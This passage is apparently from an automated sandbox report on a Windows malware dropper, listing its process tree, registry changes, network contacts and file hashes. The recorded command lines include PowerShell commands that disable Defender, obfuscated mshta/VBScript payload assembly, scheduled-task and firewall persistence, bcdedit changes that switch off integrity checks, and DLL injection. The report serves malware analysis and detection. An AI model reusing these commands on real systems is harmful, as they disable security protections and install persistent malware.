b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\Gparted\gimagex.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe
"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1661118952.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe
Mon166dc6040fb8726.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
Mon16734014a69dec.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe
Mon164c5af508c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe
Mon16ac385cfd.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe
Mon161bd381a14aea5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe
Mon1618e4439d986270.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe
Mon1661118952.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe
Mon16b7581baf7.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
Mon167f9db638e4.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe
Mon1631358b82299bd8.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
Mon16bd4a93b822a.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
Mon16737798ac26f984.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
Mon16e127a54386dd68.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
Mon16957e622fa390.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F ",0 ,TRuE ) )
C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u
C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp
"C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F
C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE
WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG
C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "Mon1661118952.exe" -F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F ",0 ,TRuE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN("C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 +TFQUjJ.N + USE8pS.0rL+ PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W& sTarT regsvr32 -s aGKpQ.W " ,0 , TrUe) )
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 +TFQUjJ.N + USE8pS.0rL+ PeLOUZb0.jKJ + N6O00.K +B6Oj.Xh + K30Q.Qo AGKPq.W&sTarT regsvr32 -s aGKpQ.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -s aGKpQ.W
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241106104111.log C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1326065463-17732016232079665164538795616749644004-1611431629-1021433569-552968636"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Program Files (x86)\Gparted\Build.sfx.exe
"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
C:\Program Files (x86)\Gparted\Build.exe
"C:\Program Files (x86)\Gparted\Build.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1739371705716997079-3753041-21431654931733133288-1560707188-21284361101814353396"
C:\Program Files (x86)\Gparted\gimagex.exe
"C:\Program Files (x86)\Gparted\gimagex.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "410733652-792252731-15552243301337362575265087720-19596527081131691164-1956904596"
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| FR | 212.193.30.45:80 | 212.193.30.45 | tcp |
| FR | 212.193.30.45:443 | tcp | |
| FR | 212.193.30.45:443 | tcp | |
| FR | 212.193.30.29:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | 56.jpgamehome.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | tweakballs.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 54.84.177.46:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | webdatingcompany.me | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | buy-fantasy-gxmes.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FR | 91.121.67.60:51630 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| DE | 212.192.241.62:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | trumops.com | udp |
| US | 8.8.8.8:53 | retoti.com | udp |
| US | 8.8.8.8:53 | logs.trumops.com | udp |
| US | 8.8.8.8:53 | logs.retoti.com | udp |
| US | 8.8.8.8:53 | www.yahoo.com | udp |
| US | 8.8.8.8:53 | f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com | udp |
| US | 8.8.8.8:53 | server14.trumops.com | udp |
| US | 44.221.84.105:443 | server14.trumops.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | dumancue.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 44.221.84.105:443 | server14.trumops.com | tcp |
| FI | 135.181.79.37:10902 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
| MD5 | 0c0e1a604e0da52b76b20bc2adba8192 |
| SHA1 | c6df017caaebdfbf3d86b022570aeb6c2cee1f3a |
| SHA256 | a8e57cdcd0fa1640cde72c232cd5c3b07be08f2ac5ed88d78dcc93b627c935e2 |
| SHA512 | 797568375efa0902493cadffa79ad0638a34d3cda2ae961557fe9c77c463a9ffd4a40695464aeaf19a3be7f29c085538e0e1eaac52e7c15a1de95b2db2621d8e |
\Users\Admin\AppData\Local\Temp\7zS47BF0566\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2860-60-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS47BF0566\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2860-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-82-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2860-81-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2860-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe
| MD5 | 4f11e641d16d9590ac1c9f70d215050a |
| SHA1 | 75688f56c970cd55876f445c8319d7b91ce556fb |
| SHA256 | efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0 |
| SHA512 | b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe
| MD5 | f4a5ef05e9978b2215c756154f9a3fdb |
| SHA1 | c933a1debeea407d608464b33588b19c299295c6 |
| SHA256 | d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69 |
| SHA512 | f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
| MD5 | 999cfa89375bc54358907287d1fc7462 |
| SHA1 | 7e67a8f2161e36da1d26a5bc3dc70eb00f313345 |
| SHA256 | e74473a1edde3b073d2242d2efaa98bf548ab71a8515110a05f39a9f6a0ae69a |
| SHA512 | 169df388945cef468b88e1e963c68a2fae62e6ec238d53c8aaf6712e75789a6c94673f7c338ad5de42d4a6733f9919e7d7b7d087c5e94514479c1e85e8153b65 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe
| MD5 | 83a0d323899ff2f761f434dc017900ba |
| SHA1 | a44010a7d098a737f30ea04d280502d99718b18d |
| SHA256 | b90fd0244165858b4b4d1390f039731fbce2730a7482588f13e66e52e20fe124 |
